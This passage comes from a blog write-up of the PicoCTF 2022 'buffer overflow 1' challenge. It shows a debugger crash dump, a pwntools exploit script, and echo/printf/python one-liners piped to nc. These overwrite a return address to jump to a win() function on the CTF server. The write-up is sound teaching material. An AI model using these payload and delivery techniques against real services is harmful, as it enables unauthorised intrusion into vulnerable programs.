<span class="n">Program</span> <span class="n">received</span> <span class="n">signal</span> <span class="n">SIGSEGV</span><span class="p">,</span> <span class="n">Segmentation</span> <span class="n">fault</span><span class="p">.</span>
<span class="p">[</span><span class="o">----------------------------------</span><span class="n">registers</span><span class="o">-----------------------------------</span><span class="p">]</span>
<span class="n">EAX</span><span class="o">:</span> <span class="mh">0x13</span> 
<span class="n">EBX</span><span class="o">:</span> <span class="mh">0x41326241</span> <span class="p">(</span><span class="err">'</span><span class="n">Ab2A</span><span class="err">'</span><span class="p">)</span>
<span class="n">ECX</span><span class="o">:</span> <span class="mh">0x13</span> 
<span class="n">EDX</span><span class="o">:</span> <span class="mh">0xffffffff</span> 
<span class="n">ESI</span><span class="o">:</span> <span class="mh">0x1</span> 
<span class="n">EDI</span><span class="o">:</span> <span class="mh">0x80490e0</span> <span class="p">(</span><span class="o">&lt;</span><span class="n">_start</span><span class="o">&gt;:</span>       <span class="n">endbr32</span><span class="p">)</span>
<span class="n">EBP</span><span class="o">:</span> <span class="mh">0x62413362</span> <span class="p">(</span><span class="err">'</span><span class="n">b3Ab</span><span class="err">'</span><span class="p">)</span>
<span class="n">ESP</span><span class="o">:</span> <span class="mh">0xffffd0b4</span> <span class="o">--&gt;</span> <span class="mh">0xffffd184</span> <span class="o">--&gt;</span> <span class="mh">0xffffd334</span> <span class="p">(</span><span class="s">"/home/shinris3n/sec/CTFs/PicoCTF2022/buffer overflow 1/vuln"</span><span class="p">)</span>
<span class="n">EIP</span><span class="o">:</span> <span class="mh">0x0</span>
<span class="n">EFLAGS</span><span class="o">:</span> <span class="mh">0x10282</span> <span class="p">(</span><span class="n">carry</span> <span class="n">parity</span> <span class="n">adjust</span> <span class="n">zero</span> <span class="n">SIGN</span> <span class="n">trap</span> <span class="n">INTERRUPT</span> <span class="n">direction</span> <span class="n">overflow</span><span class="p">)</span>
<span class="p">[</span><span class="o">-------------------------------------</span><span class="n">code</span><span class="o">-------------------------------------</span><span class="p">]</span>
<span class="n">Invalid</span> <span class="err">$</span><span class="n">PC</span> <span class="n">address</span><span class="o">:</span> <span class="mh">0x0</span>
<span class="p">[</span><span class="o">------------------------------------</span><span class="n">stack</span><span class="o">-------------------------------------</span><span class="p">]</span>
<span class="mo">0000</span><span class="o">|</span> <span class="mh">0xffffd0b4</span> <span class="o">--&gt;</span> <span class="mh">0xffffd184</span> <span class="o">--&gt;</span> <span class="mh">0xffffd334</span> <span class="p">(</span><span class="s">"/home/shinris3n/sec/CTFs/PicoCTF2022/buffer overflow 1/vuln"</span><span class="p">)</span>
<span class="mo">0004</span><span class="o">|</span> <span class="mh">0xffffd0b8</span> <span class="o">--&gt;</span> <span class="mh">0xffffd18c</span> <span class="o">--&gt;</span> <span class="mh">0xffffd370</span> <span class="p">(</span><span class="s">"SHELL=/bin/bash"</span><span class="p">)</span>
<span class="mo">000</span><span class="mi">8</span><span class="o">|</span> <span class="mh">0xffffd0bc</span> <span class="o">--&gt;</span> <span class="mh">0x3e9</span> 
<span class="mo">0012</span><span class="o">|</span> <span class="mh">0xffffd0c0</span> <span class="o">--&gt;</span> <span class="mh">0xffffd0e0</span> <span class="o">--&gt;</span> <span class="mh">0x1</span> 
<span class="mo">0016</span><span class="o">|</span> <span class="mh">0xffffd0c4</span> <span class="o">--&gt;</span> <span class="mh">0x0</span> 
<span class="mo">0020</span><span class="o">|</span> <span class="mh">0xffffd0c8</span> <span class="o">--&gt;</span> <span class="mh">0x0</span> 
<span class="mo">0024</span><span class="o">|</span> <span class="mh">0xffffd0cc</span> <span class="o">--&gt;</span> <span class="mh">0xf7ddb905</span> <span class="p">(</span><span class="o">&lt;</span><span class="n">__libc_start_main</span><span class="o">+</span><span class="mi">229</span><span class="o">&gt;:</span>       <span class="n">add</span>    <span class="n">esp</span><span class="p">,</span><span class="mh">0x10</span><span class="p">)</span>
<span class="mo">002</span><span class="mi">8</span><span class="o">|</span> <span class="mh">0xffffd0d0</span> <span class="o">--&gt;</span> <span class="mh">0x1</span> 
<span class="p">[</span><span class="o">------------------------------------------------------------------------------</span><span class="p">]</span>
<span class="n">Legend</span><span class="o">:</span> <span class="n">code</span><span class="p">,</span> <span class="n">data</span><span class="p">,</span> <span class="n">rodata</span><span class="p">,</span> <span class="n">value</span>
<span class="n">Stopped</span> <span class="n">reason</span><span class="o">:</span> <span class="n">SIGSEGV</span>
<span class="mh">0x00000000</span> <span class="n">in</span> <span class="o">??</span> <span class="p">()</span>
</code></pre></div></div>

<ul>
  <li>
    <p>We can see that this time, we’ve successfully overwrote the return address with the win() function and the local flag is returned before the program crashes and exits.</p>
  </li>
  <li>
    <p>Now we can write some code that will interact with the network service and get the real flag.  An easy way to do this, and again one that will work more generally, is to use python pwntools (which may be installed via <code class="language-plaintext highlighter-rouge">pip3 install pwn</code>).</p>
  </li>
</ul>

<div class="language-python highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="c1"># PicoCTF 2022 - Buffer Overflow 1
# shinris3n/NINPWN
</span>
<span class="kn">from</span> <span class="nn">pwn</span> <span class="kn">import</span> <span class="o">*</span> <span class="c1"># pip3 install pwn
</span>
<span class="c1"># Open up connection.
</span><span class="n">address</span> <span class="o">=</span> <span class="s">'saturn.picoctf.net'</span>
<span class="n">port</span> <span class="o">=</span> <span class="mi">59737</span>
<span class="n">tcpsocket</span> <span class="o">=</span> <span class="n">remote</span><span class="p">(</span><span class="n">address</span><span class="p">,</span> <span class="n">port</span><span class="p">)</span>

<span class="c1"># Receive server input request
</span><span class="k">print</span><span class="p">((</span><span class="n">tcpsocket</span><span class="p">.</span><span class="n">recvuntil</span><span class="p">(</span><span class="s">'</span><span class="se">\n</span><span class="s">'</span><span class="p">.</span><span class="n">encode</span><span class="p">(</span><span class="s">'latin-1'</span><span class="p">))).</span><span class="n">decode</span><span class="p">(</span><span class="s">'latin-1'</span><span class="p">))</span>

<span class="c1"># Define payload
</span><span class="n">payload</span> <span class="o">=</span> <span class="s">"Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab</span><span class="se">\xf6\x91\x04\x08</span><span class="s">"</span>

<span class="c1"># Encode and send payload
</span><span class="n">tcpsocket</span><span class="p">.</span><span class="n">sendline</span><span class="p">(</span><span class="n">payload</span><span class="p">.</span><span class="n">encode</span><span class="p">(</span><span class="s">'latin-1'</span><span class="p">))</span>
<span class="k">print</span> <span class="p">(</span><span class="s">'Sent: 0x'</span> <span class="o">+</span> <span class="n">binascii</span><span class="p">.</span><span class="n">hexlify</span><span class="p">(</span><span class="n">payload</span><span class="p">.</span><span class="n">encode</span><span class="p">(</span><span class="s">'latin-1'</span><span class="p">)).</span><span class="n">decode</span><span class="p">(</span><span class="s">'latin-1'</span><span class="p">)</span>
<span class="p">)</span>

<span class="c1"># Receive flag
</span><span class="k">print</span><span class="p">((</span><span class="n">tcpsocket</span><span class="p">.</span><span class="n">recvline</span><span class="p">()).</span><span class="n">decode</span><span class="p">(</span><span class="s">'latin-1'</span><span class="p">))</span> <span class="c1"># Receive line after string is entered
</span><span class="k">print</span><span class="p">((</span><span class="n">tcpsocket</span><span class="p">.</span><span class="n">recv</span><span class="p">()).</span><span class="n">decode</span><span class="p">(</span><span class="s">'latin-1'</span><span class="p">))</span> <span class="c1"># Receive the flag
</span>
<span class="c1"># Catch a shell (N/A to this challenge, but sharing because it's an extremely helpful function to know about when needing to exploit a system!)
# tcpsocket.interactive()
</span></code></pre></div></div>
<ul>
  <li>The exploit code establishes a connection to our instance and uses our previous payload string to successfully capture the flag:</li>
</ul>

<div class="language-console highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="go">┌──(shinris3n㉿kodachi)-[~/sec/CTFs/PicoCTF2022/buffer overflow 1]
</span><span class="gp">└─$</span><span class="w"> </span>python3 exploit.py 
<span class="go">[+] Opening connection to saturn.picoctf.net on port 59737: Done
Please enter your string: 

Sent: 0x4161304161314161324161334161344161354161364161374161384161394162304162314162324162334162f6910408
Okay, time to return... Fingers Crossed... Jumping to 0x80491f6

picoCTF{redacted_flag_try_it_yourself_at_the_picoGym!}
[*] Closed connection to saturn.picoctf.net port 59737
</span></code></pre></div></div>

<ul>
  <li>If the pwntools library is not available, or for some reason the script doesn’t seem to interact properly with the service, command line solutions sending across the same payload include the following:</li>
</ul>

<div class="language-console highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="go">(Using echo)

</span><span class="gp">shinris3n@bokken:~/sec/CTFs/PicoCTF2022/buffer overflow 2$</span><span class="w"> </span><span class="o">(</span><span class="nb">echo</span> <span class="nt">-ne</span> <span class="s1">'Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab\xf6\x91\x04\x08\n'</span><span class="p">;</span> <span class="nb">cat</span> -<span class="o">)</span> | nc saturn.picoctf.net 60968
<span class="go">Please enter your string: 

Okay, time to return... Fingers Crossed... Jumping to 0x80491f6
picoCTF{redacted_flag_try_it_yourself_at_the_picoGym!}
</span></code></pre></div></div>

<div class="language-console highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="go">(Using Python 3)

</span><span class="gp">shinris3n@bokken:~/sec/CTFs/PicoCTF2022/buffer overflow 2$</span><span class="w"> </span><span class="o">(</span>python3 <span class="nt">-c</span> <span class="s2">"import sys; sys.stdout.buffer.write(b'Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab</span><span class="se">\x</span><span class="s2">f6</span><span class="se">\x</span><span class="s2">91</span><span class="se">\x</span><span class="s2">04</span><span class="se">\x</span><span class="s2">08')"</span><span class="p">;</span> <span class="nb">cat</span> -<span class="o">)</span> | nc saturn.picoctf.net 60968
<span class="go">Please enter your string: 

Okay, time to return... Fingers Crossed... Jumping to 0x80491f6
picoCTF{redacted_flag_try_it_yourself_at_the_picoGym!}
</span></code></pre></div></div>

<div class="language-console highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="go">(Using printf)

</span><span class="gp">shinris3n@bokken:~/sec/CTFs/PicoCTF2022/buffer overflow 2$</span><span class="w"> </span><span class="o">(</span><span class="nb">printf</span> <span class="s1">'Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab\xf6\x91\x04\x08'</span><span class="p">;</span> <span class="nb">cat</span> -<span class="o">)</span> | nc saturn.picoctf.net 58429
<span class="go">Please enter your string: 

Okay, time to return... Fingers Crossed... Jumping to 0x80491f6
picoCTF{redacted_flag_try_it_yourself_at_the_picoGym!}
</span></code></pre></div></div>



  <small>Tags: <em>PicoCTF2022</em>, <em>buffer overflows</em></small>


      </section>
    </div>

    
  </body>
</html>
